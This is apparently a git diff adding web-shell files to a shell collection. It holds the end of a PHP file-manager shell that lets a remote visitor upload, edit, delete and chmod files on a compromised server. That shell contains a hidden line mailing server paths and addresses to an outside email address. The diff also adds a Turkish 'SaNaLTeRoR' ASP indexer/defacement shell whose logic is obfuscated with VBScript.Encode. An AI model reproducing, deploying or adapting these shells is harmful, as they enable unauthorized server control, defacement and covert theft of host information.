+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile20</i><br>";}
+}
+echo $copyr;
+exit;}
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+File contents:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>
+
+";
+
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+DELETE: Are you sure?<br>
+<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+$e=$ef;
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Edit:<br>
+$de<br>";
+
+if(!@$_POST['save']){
+print "
+<form method=post>
+<input name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Save changes'></form><br>
+";
+}
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+
+if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
+$editf=stripslashes($editf);
+}
+
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<br>
+<b>File edited.</b>
+<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
+$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+
+?>
+<!-- coded by tjomi4` :: nst.void.ru -->
+
+
diff --git a/138shell/I/indexer.asp.txt b/138shell/I/indexer.asp.txt
new file mode 100644
index 0000000..9f1e13b
--- /dev/null
+++ b/138shell/I/indexer.asp.txt
@@ -0,0 +1,74 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Language" content="tr">
+<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
+<%#@~^UgsAAA==^mVs,/DXV@#@&OEk'~J@!mnUD+D@*@!4M@*@!6G.:,l1YrWUx4YOw=&zShA klxCsD+.WM KDL,YmDoY{m4^lU3,:nO4WN{2WkY@*@!rUw!Y,YzwnxkE8:bOP7ls;'JEjz1)S:3"r]cr"MJrPkry'*c@*@!&WKD:@*E@#@&m\6xE@!1+	YnD@*@!6WUY,^W^W.x^k:n~kk"+{X@*?^MkaYP_l0Vıx9l@!4M@*@!WKxY,^W^WD{A4kD+,/rynxy@*@!z1nxD+.@*@!Vk@*$!PjmMraY~g+kx+,r^;şY!Dhl,CCV0ıP..k^:kş,#nXmP`x;Y;ssEş~?.\DsCMlPİU[6~bDhm3~j+,?+M\.Nm3rPz/2~BPw42PBPlk2aPTk(k~NGdHlslMıUPbç+.rğbxk~G0Ehl0~bçkU,XmyıVsışYıM @!(D@*@!^k@*$!P?1.kaYV~$kMPÇK3~?rOXnP`ğ.lşsl[C	P}C4s+O/b"1+~İ	N6PzYm8k^k./bxr"c`PUPPGW/D~jkD+^+.k~umDrçP*@!Vb@*j^MkwOr	PFE^smxısışı,İV0PAm3ışDCPnl.ışı3,Mnsm+0OkMR@!^r@*SüD0x~ArsTk~29rxs+V~İçbxPF;^VCxsC,|ısm\!yE	E,63!X;x!y  c@!4M@*@!1+xDn.@*@!k@*AzP\n4NrJ@#@&3!VsC	k:xE@!mnxDnM@*@!6W	YP1W^GD{Vr:Pdr.+'l@*|!VVmUıhP~k^orVn.b@!8D@*@!0KxO~1WVG.{h4kDn,/r.+{ @*@!z1nxD+.@*@!0GUDP/b"+{F@*@!sr@*g+MNnx_~~E.lHCPzYC^mğıxıy~r	Nn6b~Tk.bx,`bDl1Cğıxı.Prx9+a~n+x9rPUkYUry9+,rs:Csı*ÖDU)Gn0mEsOcl/2@!^k@*1.XnQP~EPnı/sCPİ	Nn6bPuC	ok,jkD+X~)Ymmm3dlUı",WUE	~XDrUbPXC"mmC3kıUı.Pö.	P=PRczc zmVrxbxdrD+/b mK:P@!C~tM+6'_W.U3@*@!6GxDP^G^WDxsb:n@*G)_b~wb\Sb,ÖIg3|,"Z@!Jl@*@!J0W	O@*@!Vk@*6VE,g,A;DCzmPG3!hl0PrdD+Nnğr	k"PGGkXC	ıx,bNı	ıPjnPI+.k	k~emyıx,@!l,tDWxgKD	+V @*@!6WUY,^W^W.x^k:n@*Gbub,oz}JzPÖ"12nR@!&l@*@!&0KxO@*@!4D@*@!mxY.@*AHP@!l~t.n6'hlbsYK)hCbV4Gh(@$4WDhmkscmK:gkE(%+1Yxk	NnaD@*tnt9k@!JC@*@!(D@*?2+^rmV~K4Cx0/~PKPCGsHfn:KU,~30WMW:mx,SP_kO4mXOCMP~GnVb0kşVE@#@&mKwz'E@!1+UY.@*@!0GUDPmGsKDxVbhPdby'*@*Ksk6Pul03ı@!8M@*@!6GxDPmKsGD{h4kO+~dbyn'y@*@!JmnUD+D@*@!^k@*A!~Um.bwDPHt9rP:l.l6ıx[C	P5m"ıVsışYıDc@!sk@*fğ+.Vr~:lVı:,)D0l[Cş^lDıh~_WsXGnsWUvb9:k	#,SPA3GDK:CU,`sc6RqPl9hrxbP*PSPurD4CXDCDv?CUmVb.n	l~b9hbxr*PBPfVbWkş3~`UlUC^bDUl,bNsrUk*PBPPE.C	/G0D~`:E.C	/WWOcKVPz[skUb#,~Pg+K~.PPü:,b[CsPr^Cx^lDm~P+ş30üDs+. c@!sk@*$E,?^.bwY~)kVCP@!WKxO,mKVWM'^r:@*JWTPcVmXıY*~@!J0W	O@*K!Ysl"R@!sb@*3L9nDbx~ezwYığı~$!xCP~n	ynMPUmDbwD~KüsP$k^orsDk,JWTVEHG.P~k^orxr"R Rv$E,KCVısNlU~UmGD^nXP9xxPdlsnD,\nPAL[nMPSmh+MkP:üh~Aİ^obVnDr~dWLV!zWMVC.*@!Vr@*Vü\nx^r,ArMPUmDbwD~İçk	Pjl9+^n,?K,dmMkwDsnDbxbPFEssmxhl	ı"ıPÖ	+.rMky E@#@&sk	V^+.{J@!m+	Y.@*@!0GxDP^G^WD{sks+Pkr"+{*@*fG/O~UkO+^nD@!4.@*@!0WUO,mGVK.{h4bYP/byx @*@!&mxOnM@*@!^r@*ShhcdCxmVD+.W. KDL@!^r@*ShA 6lY4nMWWh8cmGs@!^k@*ShS /mxCVmDnUmRmKh@!^k@*SAARDEMlU/GWDRO3@!sk@*hAAcYl4.b4CYc^K:@!^k@*hhSRbdVm:CtbyhnDRmKh@!^k@*SAAR4lMEUXC4Hl WML@!1+UOD@*@!WKxOP1G^W.{DNPkk.n'W@*Jbt2]~UİK2d3Iİ@!zmUO+M@*@!4.@*@!WKxOPkry'+@*@!Vk@*ASh /m8KYCT+ Y+m:cGDTPSPShA kl\kC3cmWs~SPShSRhkUr6 xOJ@#@&GLP'~];;+kOcp;DH?YMk	L@#@&kWPKon~{PJr~Y4+x@#@&^l^V,:CkU@#@&+s/r0,WLn,'PE!Kx[+ME,Y4x@#@&mmV^~mm/nF@#@&nsk+k6~WT+P{~EW0ErPOtnU@#@&^l^sP1ldny@#@&nsk+r0,GT+~{Prtl03bUNmJ~Y4+U@#@&ml^sP1l/f@#@&Vk+r0~GT+~',E3!VsC	k:E~Dtnx@#@&1ls^P1l/c@#@&+^/nk6PGLP',EmKwXr~Otx@#@&^lss,mC/X@#@&+sdk0~GT+~',E^kU0VDJ,Y4nx@#@&^l^V~^m/++@#@&V/rWPKoPxPEGMxn3r~Y4+U@#@&mlss,mC/{@#@&n^/k0,WTnP{PEWMxnVyJPD4+	@#@&1CsV,mm/n%@#@&x[PbW@#@&/;8,:lrUS40DAA==^#~@%>
+<center>
+<br><br><br><br><br><br><br><br>
+<br><br><br><br><br><br><br><br>
+<hr color=lime width=50%>
+<SCRIPT LANGUAGE="JavaScript">
+ <!-- 
+function Start(page)
+ {
+ OpenWin = this.open(page, "CtrlWindow","toolbar=menubar=No,scrollbars=No,status=No,height=250,");
+ }
+ //-->
+</SCRIPT>
+<script language="JavaScript1.2">
+var message="SaNaLTeRoR - İnDexEr - Reader"
+var typingbasecolor="red"
+var typingtextcolor="lime"
+var blinkspeed=598 
+var fontface="arial,geneva,helvetica"
+var fontsize="5"
+var n=0
+if (document.all){
+document.write('<font face="'+fontface+'" size="'+fontsize+'" color="'+typingbasecolor+'">')
+for (m=0;m<message.length;m++)
+document.write('<span id="typinglight">'+message.charAt(m)+'</span>')
+document.write('</font>')
+var tempref=document.all.typinglight
+}
+else
+document.write(message)
+function typing(){
+if (n==0){
+for (m=0;m<message.length;m++)
+tempref[m].style.color=typingbasecolor
+}
+tempref[n].style.color=typingtextcolor
+if (n<tempref.length-1)
+n++
+else{
+n=0
+clearInterval(blinking)
+setTimeout("starttyping()",1500)
+return
+}
+}
+function starttyping(){
+if (document.all)
+blinking=setInterval("typing()",blinkspeed)
+}
+starttyping()
+</script> 
+<form action="?Gonder" method="post">
+<center><table>
+<td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
+<td><input type="submit" onclick="submit()" value="Veriyi Gönder"></td><tr>
+<td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="reset" onclick="reset" value="    Temizle    "></td><tr>
+</form>
+<form action="?oku" method="post">
+<td><font color=pink>Oku :</font><td><input type="text" name="klasor" size=25 value=<%=#@~^LQAAAA==.;;/DR/D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit" onclick="submit()" value="  Veriyi Oku   "></td><tr>
+</form>
+</table><br>
+<a href="javascript:void(0);" onclick="javascript:Start ('?hakkinda');">
+Script Hakkında </a> - <a href="javascript:void(0);" onclick="javascript:Start ('?kullanim');">Kullanım Bilgileri </a>- <a href="javascript:void(0);" onclick="javascript:Start ('?copy');">Copright</a> -<a href="javascript:void(0);" onclick="javascript:Start ('?linkler');"> Linkler</a>
+<br><br><br>
+<hr color=lime width=50%>
+<%#@~^VA4AAA==n	N~kE(@#@&EO RO ORO ORR OO RO O@#@&d;4,mm/nF@#@&Kx~+M.WMP.nkE:n~	+aY@#@&	+.9+	P',D5E/OR6W.hvJx.NxJ*@#@&xDXnPx~M+5EdYc0G.s`JUnM+z+rb@#@&jY,EYbVk~',?nD7+. ;D+mO+}4L^O`rHU/RPGKVdJ*@#@&b0~nMDP@!@*,!~Y4n	P@#@&D/wKxknRSDrYPE@!1+xDnD@*Cb:)~),JL+.D [/^Db2YbWU'r@!z^n	YnD@*E@#@&n^/@#@&M+k2W	/nRSDrOPJİş^n:bxk.~$lşmDı^ıJ@#@&nU9Pr0@#@&EDksdcnDG^/dsK.sPUDX+BP	nD9+U@#@&DndaWxknRSDkDn~J@!mxO+.@*@!4.@*@!WWM:~C1YkGU{g~:O4W[{wK/Y@*@!bUw!Y~YHwnxkE4srY,\l^;n'rJz1)Pj)Is)Jr~/bynxWc@*@!&6W.:@*E@#@&@#@&+	NPkE(@#@&EORO ORR OO RO OO RRO@#@&kE8P^Ck++@#@&Gx,+..KDP.nkEh+,U6O@#@&0VlkWM~',Dn;!+dOc0WMh`r3VmdGDr#@#@&j+O~K4%C:Pn,'~jD\n.cZ.+mOr8N+1Y`rHb^DK/G0DRp\dCK:KJ*@#@&bW~P	WDPnD.~{PTPD4+	P@#@&M+/2G	/nRS.bYn,J@!m+	Y.@*_bPb,)~EL+DM N/mMr2YbW	[E@!^n	YnD@*E@#@&+U[,k0@#@&K4%C:PhR6a+	PJV2:E~,JE[0VCdKD[rE~,0l^dn@#@&W(LuKPKc?nx9@#@&0W[smDPx~k+.\.ctOsVAxmKNcW(LuK:n ]/wKU/K+XOb@#@&D/2WUdRADbO+,J@!WKxY~^KVGD{A4kOPkky'l@*@!1+UYD@*~ P.A]İSAIP ~@!4M@*@!mnxOnM@*@!YaYmDnC,/Yzs'vhb[DtlO!uitkT4Y=&X!pB@*EL3W9slM[J@!&O+XYmDnl@*E@#@&.+k2W	/n SDkOn,J@!4M@*@!0GM:,lmDkKU'QPh+DtG[{wWkO@*@!kxa;OPDXa+x/;8skOP7CV!+xErb1)~UbeszErPdby'cW@*@!&0KDh@*r@#@&n	NPk;4@#@&B RRO O ORORR ORO RO @#@&d!4P^Ck+f@#@&./2Kxk+RSDbO+,JE[1\W'rJ@#@&.+kwW	dnRSDbYnPEELY;/LEJ@#@&nU9P/;8@#@&vO R OR O OO O RO ORO @#@&d!4P1C/c@#@&.n/aW	/nRA.bYnPrE[0Essmxkh'rJ@#@&MnkwG	/RhMkDnPrJ'Y!/'Er@#@&UN,/E(@#@&B O ORORR ORO RO ORR O@#@&d!4~mmd*@#@&D/wKxknRSDrYPEELmWaz[rJ@#@&.n/aW	/nRA.bYnPrE[DEd'rJ@#@&n	N~/!8@#@&v O OO O RO ORO ORR OO@#@&/!4P1Cd++@#@&Dn/2G	/nRS.kD+~Er[SrU0VnDLEr@#@&M+kwW	/ hMkO+,JE'DE/LEJ@#@&+	[~/!4@#@&vORR ORO RO ORR OORR O@#@&k;(P^m/G@#@&DdwKxd+ch.rD+Pr@!Vb@*İV0~ÖUmPnE.4CUı	PjkDn/bxn~zY:CV,kçrx,8bD~bx9+6,tm"ıD^lzıxc@!sr@*?Yc~k	N+Xn.Pmx9P.+C[D~?1.kaYrUbxPeC	ıxCPIüV^+zbxc@!Vb@*UGxMl~k	Nna,Alkısl1l3,drYX^+~lzUı,/nD7nD9lU~kkYn~mVıUPJ~wDnVDPbçk	~h4dls4C~bN+ms@!^k@*Grz+^ksP)NChı	PjkDn/bPW.+tGdDFfRSn(/Cs4mRmK:Jhl4:;Y,/r"9+PSn4kl:(C[l	P6Dn+4GkYq&cA+(/Ch(lR^Gszhl4d!x~9kH+4bD,z+MPCV9ığıxı"ı~7lDkCXmVı:@!sr@*UY,kUNnaD~l	[PM+C[DPd^Mk2YbUbPWM+tWkY8fRS+8/m:8CcmWs&:mt/!U&k	N6nD Ckw~ob8k,XüVsNkUr.R@!Vb@*_l"ıMVmNığıxı.PbUN6rNPCz	ıPX.+,lYDıUı"R@!Vb@*Şr:[r,MnV9rPnE.8mxl~r	Nn6b~mYhmXmP/DPbUN6nD,lU[,D+m[+MP/1.rwDk	NnP@!WKxOP1GVKDx2bx3@*HD[+	@!J0G	Y@*PXmymUPH+.+,lOC1lğı:ı.~k	N+Xrhk.k	PCNıUı~Hl"ıXK.E.Rcr	N+a 4YhV,Lb4r*@!^k@*@!0KUY,mGVKDx2bx3@*H+M+X@!&0KxD@*~|ıdhı	l~İ/~b9lhıU,+8~nlslkö.ü,4r.NxP(k.r:,3slköD[n	P4b~l^YP9r"k	NPGV[;ğ!Prçk	~RczhC4:EO&bx[+X 4Yh,XmyıXKD!"P(E.Nm3r~bxNaR4Y:,C[lsıx,/rYndbx[+0rPbx[nXB+~LöM+~NğrşbD~s+k+VmP9n0mEsYcld2,0k^Cx9lPKsC4bVbD @!sr@*.nDbzk,MöU[DPP;ş!xCP~CkYığıhı.NmPb9ls~İx9+ak,XnhbşPr^;XKDR@!sr@*~E,kşs+h[P@!0KUY,mGsKD'2r	3@*r0;@!zWKxD@*P0ı/sı~AKşPFl^l^C0R@!^r@*zDYı0~ul^l,bUVChmNız/mUıy,)~hmkV8Gs4@$tKOslr^R1W:,~,4W^X[+sWU@$4WYsCk^RmKh~~,hSh /CUmVO+MGDcW.L,/kOnsk"NU,\n,/bY+,l9hk	P&PsW[smDıx9Cx,XlM[ıhPmVm4rVr.kkUk. Pr@#@&./wGUk+ hMrD+~rJLYEk[rE@#@&+UN,/;8@#@&B RO OO RRO O ORORR OR@#@&dE(P^Ck+%@#@&M+dwKUk+ SDbY+,J@!8D@*@!8D@*@!^n	Y+M@*A!P/1.rwDPt+4Nr~:l.l6ıUNmx~jcKP)[ı	l~5m"ı^:ışOıMR@!4D@*ÜmMnY^k~.PÜ^.Y/b"Pz/w,uG/DVmDıUPPühü	NnPÇmsışıDcR@!8M@*b[./~?mOıMıPFık:ı	lPnW9;x!P!öDü	Yüsns+3,İdYNkğbUry,fK/zlUıU,b[ıxı,zl.ıx  @!4D@*P6OlMnmP$ö^ü:ü,2ğ+MP~Gş/mPulDl~#mDPGn:3Yb. @!(D@*|;D8C	ıx~fKdXmVC.ı	ıPMö.üUDüVnX8bVh3,İçkx,bHUıPU+.\D[n,rVsCxı.PSm"ıhP_N9Pol.VYh+. R,@!8.@*bN.nkPFı/sıUmPPm:,.+Mk,!kMkskMPcö.	)P9l-S+4'Csk1l	-[+WC!VORmdw@!4.@*@!Vk@*HVnD,emwC(k^kDb:@!8D@*?rYNnVbPk	^V!N+^n.k,Ym3rw~n9+.+0~b9:rU,nlUn^kU+,i^lşhm@!(D@*zNsrx,ŞkWD/rUbPÇl^hl@!4D@*jn/kkKx~.n~;WG3bnPG+ğn.^+Dr~ÇmVCDmV,SGTk	Pr^:m@!4M@*jkD+snMkx,#+MkP:C8l	VmDıUıPİU[bDh+,-/cR E@#@&DndaWU/ SDrD+,JJLY!d[rJ@#@&x[~kE4@#@&B OO RRO O ORORR ORO R@#@&WVIEAA==^#~@%>
+</table>
+<%#@~^CQAAAA==d!4~kYHV+mwMAAA==^#~@%>
